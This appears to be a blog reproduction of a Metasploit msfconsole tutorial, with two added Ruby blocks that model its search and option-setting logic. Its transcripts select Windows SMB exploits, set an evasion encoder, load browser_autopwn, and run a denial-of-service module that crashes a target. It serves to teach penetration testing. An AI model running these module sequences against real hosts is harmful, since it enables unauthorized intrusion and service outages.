Thursday 25 February 2010

msfconsole

The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.

The msfconsole interface will work on Windows with the 3.3 release, however users of version 3.2 will need to either manually install the Framework under Cygwin, along with patching the Ruby installation, or access the console emulator via the included web or GUI components.

Benefits of the msfconsole:

  • It is the only supported way to access most of the features within Metasploit.
  • Provides a console-based interface to the framework
  • Contains the most features and is the most stable MSF interface
  • Full readline support, tabbing, and command completion
  • Execution of external commands in msfconsole is possible:

    msf > ping -c 1 192.168.1.2
    [*] exec: ping -c 1 192.168.1.2

    PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data.
    64 bytes from 192.168.1.2: icmp_seq=1 ttl=128 time=10.3 ms

    --- 192.168.1.2 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms
    msf >

Getting Help

Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.

msf > help

Core Commands
=============

Command     Description
-------     -----------
?           Help menu
back        Move back from the current context
banner      Display an awesome metasploit banner
cd          Change the current working directory
connect     Communicate with a host
exit        Exit the console
help        Help menu
info        Displays information about one or more module
irb         Drop into irb scripting mode
jobs        Displays and manages jobs
load        Load a framework plugin
loadpath    Searches for and loads modules from a path
quit        Exit the console
resource    Run the commands stored in a file
...snip...

Tab Completion

One of the more useful features of msfconsole is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to make use of. As with most other shells, entering what you know and pressing 'Tab' will present you with a list of options available to you or auto-complete the string if there is only one option.

msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/msdns_zonename
msf > use exploit/windows/smb/ms08_067_netapi

"show" Command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.

msf > show

Encoders
========

Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
...snip...

There are a number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'.

Executing 'show auxiliary' will display a listing of all of the available auxiliary modules within Metasploit. Auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

Auxiliary
=========
Name Description
---- -----------
admin/backupexec/dump Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry Veritas Backup Exec Server Registry Access
admin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized Administrative Access
...snip...


Naturally, 'show exploits' will be the command you are most interested in running since, at its core, Metasploit is all about exploitation. Run 'show exploits' to get a listing of all exploits contained in the framework.

msf > show exploits

Exploits
========
Name Description
---- -----------
aix/rpc_ttdbserverd_realpath ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow

...snip...

Running 'show payloads' will display all of the different payloads for all platforms available within Metasploit.

msf > show payloads

Payloads
========
Name Description
---- -----------
aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port AIX Command Shell, Find Port Inline
aix/ppc/shell_reverse_tcp AIX Command Shell, Reverse TCP Inline
...snip...

As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================

Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX or Win7)
...snip...

If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.

msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
...snip...

If you wish to further fine-tune an exploit, you can see more advanced options by running 'show advanced'.

msf exploit(ms08_067_netapi) > show advanced

Module advanced options:

Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port

...snip...

"search" Command


The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for, you can search for it via 'search <pattern>'. In the output below, a search is being made for MS Bulletin MS09-001. The search function will locate this string within the module references.

Note that Metasploit module names use underscores where the bulletin IDs use hyphens (ms09_001_write for MS09-001).

msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...

Auxiliary
=========

Name Description
---- -----------
dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset
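To show how a bulletin-style search such as 'ms09-001' can land on a module whose name is spelled with underscores, here is an added example in Ruby. It is not Metasploit's own code and does not use the framework: it models the behaviour described above over a small constructed module index. Only the module names and the MS09-001 description come from the page; the "MSB-<bulletin>" reference strings and the placeholder descriptions are assumptions made for the example.

```ruby
# Added example, not Metasploit's own code: a small model of the
# regex-based 'search' described on the page. The pattern is matched
# against each module's references and against its name, and because
# module names use underscores where bulletin IDs use hyphens, the name
# is also tried with hyphens in the pattern swapped for underscores.

# Constructed index in the shape of the 'show' listings. Module names
# come from the page; the "MSB-<bulletin>" reference style and the
# placeholder descriptions are assumptions for this example only.
MODULE_INDEX = [
  { type: "auxiliary", name: "dos/windows/smb/ms09_001_write",
    description: "Microsoft SRV.SYS WriteAndX Invalid DataOffset",
    references: ["MSB-MS09-001"] },
  { type: "exploit", name: "windows/smb/ms08_067_netapi",
    description: "(placeholder description)",
    references: ["MSB-MS08-067"] },
  { type: "exploit", name: "windows/smb/ms04_045_wins",
    description: "(placeholder description)",
    references: ["MSB-MS04-045"] },
  { type: "exploit", name: "windows/smb/msdns_zonename",
    description: "(placeholder description)",
    references: [] },
].freeze

# Returns the index entries whose references or name match +pattern+.
def search_modules(pattern, index = MODULE_INDEX)
  ref_regex = Regexp.new(pattern, Regexp::IGNORECASE)
  # Hyphens in the pattern (ms09-001) become underscores (ms09_001)
  # so a bulletin ID also matches the module name directly.
  name_regex = Regexp.new(pattern.tr("-", "_"), Regexp::IGNORECASE)
  index.select do |mod|
    mod[:references].any? { |ref| ref_regex.match?(ref) } ||
      name_regex.match?(mod[:name]) || ref_regex.match?(mod[:name])
  end
end

# Groups the hits by module type, as msfconsole prints them under
# "Auxiliary" / "Exploits" headings. Returns { "Auxiliary" => [names] }.
def search_report(pattern, index = MODULE_INDEX)
  headings = { "auxiliary" => "Auxiliary", "exploit" => "Exploits" }
  grouped = search_modules(pattern, index).group_by { |m| headings.fetch(m[:type]) }
  grouped.transform_values { |mods| mods.map { |m| m[:name] } }
end

# Renders the report as text resembling the console output.
def format_report(pattern, index = MODULE_INDEX)
  out = ["[*] Searching loaded modules for pattern '#{pattern}'...", ""]
  search_report(pattern, index).each do |heading, names|
    out << heading << ("=" * heading.length) << ""
    names.each { |n| out << n }
    out << ""
  end
  out.join("\n")
end

puts format_report("ms09-001") if $PROGRAM_NAME == __FILE__
```

Because the pattern is compiled as a regular expression, characters such as '.' and '(' have regex meaning here just as they do in the real 'search' command; a pattern that is not a valid regex raises RegexpError.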

"info" Command

The 'info' command will provide detailed information about a particular module including all options, targets, and other information.

msf > info dos/windows/smb/ms09_001_write

Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
Version: 6890
License: Metasploit Framework License (BSD)

Provided by:
j.v.vallejo

"use" Command

When you have decided on a particular module to make use of, issue the 'use' command to select it.

msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options

Module options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  445              yes       Set the SMB service port

msf auxiliary(ms09_001_write) >

"connect" Command

By issuing the 'connect' command with an IP address and port number, you can connect to a remote host from within msfconsole, just as you would with netcat or telnet.

msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
ÿýÿýÿý!ÿûÿû
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
ÿ
DD-WRT login:

"set" Command

The 'set' command is used to configure the options and settings of the module you are currently working with.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

Module options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.1      yes       The target address
RPORT  445              yes       Set the SMB service port

A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.

msf exploit(ms08_067_netapi) > show encoders

Compatible encoders
===================

Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder

msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

"check" Command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options

Module options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.114    yes       The target address
RPORT  42               yes       The target port


Exploit target:

Id Name
-- ----
0 Windows 2000 English


msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

Setting Global Variables

To save a lot of typing during a pentest, you can set global variables within msfconsole with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time you start msfconsole. The pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, the 'unsetg' command unsets a global variable. In the examples that follow, variables are entered in all caps (i.e. LHOST), but Metasploit is case-insensitive, so this is not necessary.

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
msf > save
Saved configuration to: /root/.msf3/config
msf >

"exploit/run" Commands

When launching an exploit, you issue the 'exploit' command, whereas for an auxiliary module the proper usage is 'run', although 'exploit' will work as well.

msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...snip...

"back" Command

Once you have finished working with a particular module, or if you have inadvertently selected the wrong module, you can issue the 'back' command to move out of the current context. This, however, is not required: just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back
msf >

"resource" Command

Some attacks, such as Karmetasploit, use a resource file that you can load through msfconsole using the 'resource' command. These files are a basic form of scripting for msfconsole: the commands in the file are run in sequence. Later on we will discuss how, outside of Karmetasploit, this can be very useful.

msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
...snip...
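The three points made in the 'setg', 'back' and 'resource' sections above (a forgotten global silently fills a module option, so check 'show options' before you run; only globally set variables survive 'back' or a module switch; a resource file runs its commands in sequence) are easiest to see in a small model. The following Ruby is an added example, not msfconsole's own code: the MiniConsole class, its option tables and the sample resource file are all constructed for the example, and only the module names and the RHOST value are taken from the page.

```ruby
# Added example, not msfconsole's own code: a model of how a
# module-local datastore ('set') layers over the global one ('setg'),
# why 'show options' is worth running before 'run', why only globals
# survive 'back' or a module switch, and how a resource file runs its
# commands in sequence. Module option tables below are constructed.
class MiniConsole
  # Constructed option tables mirroring the shape of msfconsole's
  # "Name / Current Setting / Required / Description" listing.
  MODULES = {
    "auxiliary/dos/windows/smb/ms09_001_write" => {
      "RHOST" => { default: nil,   required: true, desc: "The target address" },
      "RPORT" => { default: "445", required: true, desc: "Set the SMB service port" },
    },
    "exploit/windows/smb/ms08_067_netapi" => {
      "RHOST" => { default: nil,   required: true, desc: "The target address" },
      "RPORT" => { default: "445", required: true, desc: "Set the SMB service port" },
      "LHOST" => { default: nil,   required: true, desc: "The listen address (constructed)" },
    },
  }.freeze

  attr_reader :globals, :current

  def initialize
    @globals = {}   # setg values: survive 'back' and module switches
    @locals  = {}   # set values: belong to the selected module only
    @current = nil
  end

  # Option names are matched case-insensitively, like msfconsole.
  def key(name)
    name.upcase
  end

  def use(name)
    raise ArgumentError, "unknown module #{name}" unless MODULES.key?(name)
    @current = name
    @locals = {}    # local settings do not carry over between modules
  end

  def back
    @current = nil
    @locals = {}
  end

  def set(name, value)
    raise "no module selected" unless @current
    @locals[key(name)] = value
  end

  def setg(name, value)
    @globals[key(name)] = value
  end

  def unsetg(name)
    @globals.delete(key(name))
  end

  # Effective value and where it came from: local beats global beats default.
  def option(name)
    raise "no module selected" unless @current
    k = key(name)
    return [@locals[k], :local] if @locals.key?(k)
    return [@globals[k], :global] if @globals.key?(k)
    spec = MODULES.fetch(@current).fetch(k) { raise ArgumentError, "unknown option #{name}" }
    [spec[:default], :default]
  end

  # The check the page recommends before 'run' or 'exploit':
  # every option with its effective value and its source.
  def show_options
    MODULES.fetch(@current).map do |name, spec|
      value, source = option(name)
      { name: name, value: value, source: source, required: spec[:required] }
    end
  end

  # Required options that are still unset; a run should refuse if any remain.
  def missing_options
    show_options.select { |o| o[:required] && o[:value].nil? }.map { |o| o[:name] }
  end

  # Run a resource file's commands in sequence (the 'resource' command).
  def resource(text)
    text.each_line do |line|
      line = line.strip
      next if line.empty? || line.start_with?("#")
      cmd, *args = line.split
      case cmd
      when "use"    then use(args[0])
      when "set"    then set(args[0], args[1])
      when "setg"   then setg(args[0], args[1])
      when "unsetg" then unsetg(args[0])
      when "back"   then back
      else raise "unsupported command in resource file: #{cmd}"
      end
    end
    self
  end
end

# Constructed resource file: sets a global RHOST, then selects a module.
SAMPLE_RC = <<~RC
  # constructed example resource file
  setg RHOST 192.168.1.136
  use auxiliary/dos/windows/smb/ms09_001_write
  set rport 445
RC

# Walks through the scenario: the global RHOST follows us into the next
# module after 'back', the local RPORT does not, and LHOST is still unset.
def demo
  c = MiniConsole.new.resource(SAMPLE_RC)
  c.back
  c.use("exploit/windows/smb/ms08_067_netapi")
  { rhost: c.option("rhost"), missing: c.missing_options }
end
```

Running demo returns the RHOST value tagged :global, which is exactly the case the 'setg' section warns about: nothing in the exploit module set RHOST, yet 'show options' would show it populated from a saved global.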

"irb" Command

Running the 'irb' command will drop you into Ruby scripting mode, where you can issue commands and create scripts on the fly.

msf > irb
[*] Starting IRB shell...

>> puts "Hello, metasploit!"
Hello, metasploit!

© Offensive Security 2009